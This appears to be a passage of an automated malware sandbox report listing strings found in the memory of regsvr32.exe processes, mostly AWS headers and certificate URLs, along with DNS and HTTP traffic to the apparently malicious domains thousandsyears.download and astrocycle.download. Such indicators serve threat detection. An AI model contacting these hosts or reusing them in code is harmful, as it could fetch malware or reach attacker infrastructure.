https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submit equals www.linkedin.com (Linkedin)
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submit equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: 2 frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Z10NXV9YPC16ZYC023HEX-Content-Type-OptionsnosniffX-XSS-Protection1; mode=blockX-Frame-OptionsSAMEORIGINx-amz-ridZ10NXV9YPC16ZYC023HEPersistent-AuthWWW-Authenticateaccept-encoding,Content-Type,Accept-Encoding,X-Amzn-CDN-Cache,X-Amzn-AX-Treatment,User-AgentVaryaws_lang=en; Domain=.amazon.com; Path=/aws-csds-token=eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjU1ODIwNTcsInZpc2l0b3ItaWQiOiJhMmJkM2UwMy02NTZjLWU2ZjItNmRlOC05YTgzMjg3NTBkOTgiLCJpcCI6Ijg0LjE3LjUyLjkifQ.lQi160TBrhJ0TxrXOvfKE9QBwMYZUf5TferXwDabXSQ; Version=1; Comment="Anonymous metrics validation token"; Domain=.amazon.com; Max-Age=900; Expires=Tue, 06-Jul-2021 13:49:17 GMT; Path=/aws-priv=eyJ2IjoxLCJldSI6MCwic3QiOjB9; Version=1; Comment="Anonymous cookie for privacy regulations"; Domain=.aws.amazon.com; Max-Age=31536000; Expires=Wed, 06-Jul-2022 13:34:17 GMT; Path=/Set-CookieServerServerRetry-AfterP
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: 2 frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southeast-1.amazonaws.com https://www.buzzsprout.com; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://a0.awsstatic.com https://amazonwebservicesinc.tt.omtrdc.net https://googleads.g.doubleclick.net https://static.doubleclick.net https://website.spot.ec2.aws.a2z.com https://www.google.com https://www.gstatic.com; style-src 'self' 'unsafe-inline' https://a0.awsstatic.com; report-uri https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Z10NXV9YPC16ZYC023HEX-Content-Type-OptionsnosniffX-XSS-Protection1; mode=blockX-Frame-OptionsSAMEORIGINx-amz-ridZ10NXV9YPC16ZYC023HEPersistent-AuthWWW-Authenticateaccept-encoding,Content-Type,Accept-Encoding,X-Amzn-CDN-Cache,X-Amzn-AX-Treatment,User-AgentVaryaws_lang=en; Domain=.amazon.com; Path=/aws-csds-token=eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjU1ODIwNTcsInZpc2l0b3ItaWQiOiJhMmJkM2UwMy02NTZjLWU2ZjItNmRlOC05YTgzMjg3NTBkOTgiLCJpcCI6Ijg0LjE3LjUyLjkifQ.lQi160TBrhJ0TxrXOvfKE9QBwMYZUf5TferXwDabXSQ; Version=1; Comment="Anonymous metrics validation token"; Domain=.amazon.com; Max-Age=900; Expires=Tue, 06-Jul-2021 13:49:17 GMT; Path=/aws-priv=eyJ2IjoxLCJldSI6MCwic3QiOjB9; Version=1; Comment="Anonymous cookie for privacy regulations"; Domain=.aws.amazon.com; Max-Age=31536000; Expires=Wed, 06-Jul-2022 13:34:17 GMT; Path=/Set-CookieServerServerRetry-AfterP
        Source: regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknownDNS traffic detected: queries for: thousandsyears.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 13:34:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=V0ys7aYdAOjPlkJGrObNQ2tiQGLMnmitDVcOVn5a040LrNhwCvTf3xr2iKIXbxukcjSBigbt3O5XMd7BfJvv2cNF6mg2WXaP2PByGtiV8voZj8c0%2FeqFYxeWaum3sBcuGQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a935ba7ccc4a61-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
        Source: regsvr32.exe, 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmpString found in binary or memory: http://astrocycle.download/
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: http://astrocycle.download/Q5ZDkxZT
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: regsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
        Source: regsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootg2.amaz
        Source: regsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/root
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
        Source: regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
        Source: regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
        Source: regsvr32.exe, 00000003.00000002.2105380769.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: regsvr32.exe, 00000003.00000002.2105380769.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpString found in binary or memory: http://o.ss2.us/0
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: regsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
        Source: regsvr32.exe, 00000003.00000002.2103638650.0000000002D00000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2114595132.0000000002CB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: regsvr32.exe, 00000003.00000002.2102507557.0000000001DA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109819947.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: regsvr32.exe, 00000003.00000002.2105380769.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: regsvr32.exe, 00000003.00000002.2105380769.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: regsvr32.exe, 00000003.00000002.2103638650.0000000002D00000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2114595132.0000000002CB0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2119999321.0000000002B60000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: regsvr32.exe, 00000003.00000002.2105380769.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com;
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmpString found in binary or memory: https://amazon.com/4I
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservices.d2.sc.omtrdc.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://anchor.fm
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://aws-quickstart.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/
        Source: regsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com//
